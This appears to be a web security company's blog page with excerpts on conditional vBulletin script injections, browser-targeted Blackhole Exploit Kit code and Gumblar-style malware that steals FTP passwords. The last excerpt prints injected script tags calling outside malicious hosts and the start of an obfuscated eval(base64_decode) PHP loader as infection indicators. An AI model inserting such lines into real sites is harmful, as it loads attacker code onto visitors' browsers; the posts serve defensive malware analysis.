Sneaky vBulletin Script Injections

In the past few days/weeks we have been seeing some nasty vBulletin infections that are proving difficult to find. In this post we’ll describe it and what we have done to remove it.

We recently wrote about Conditional Malware, this is but another instance of that. In this instance, the conditions are set around specific referrers and user-agents.

When a user visits the forum via Google search engine result pages (SERP), they are greeted with this payload:

Read More

Ask Sucuri: Why Do I Only Get Malware Warnings on Certain Browsers?

A few days ago, our scanner alerted that a site had malware related to the Blackhole Exploit Kit. The owner of the site said that when he visited the site, nothing happened, and the malware wasn’t displayed – probably thinking it was a false positive.

After a bit of manual testing, we noted that the malware was only being displayed to certain browsers (IE and Chrome on Windows), and not on the others.

Once we got access to the site, we learned why. It had the following code on the index.php file:

Read More

Web site security – It starts with your desktop

If you have a web site and you want it to be secure, the first place you have protect is your desktop.

Recently (well, since 2009), a large number of sites have been infected with malware and blacklisted due to a few desktop virus (generally called Gumblar, port 8080, etc). These virus steals your FTP password and does the following things:

Infects all .js files on your site with entries like this one:

document.write( <script src="http://wap.northernplumbingandheating.com/assets/postinfo.php
document.write( <script src=http://salsafestival-berlin.de/_fpclass/BannerWebseite2009.php

It infects every .html files with entries similar to this:

script src="http://wap.northernplumbingandheating.com/assets/postinfo.php"
script src="http://shopping-dubai.com/images/runActiveContent.php"
script src="http://stb-umhau.de/images/muffin35.php"
script src="http://salsafestival-berlin.de/_fpclass/BannerWebseite2009.php"

Every PHP file with a code similar to this one:

eval(  base64_decode(" aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEd
MT0JBTF..


Read More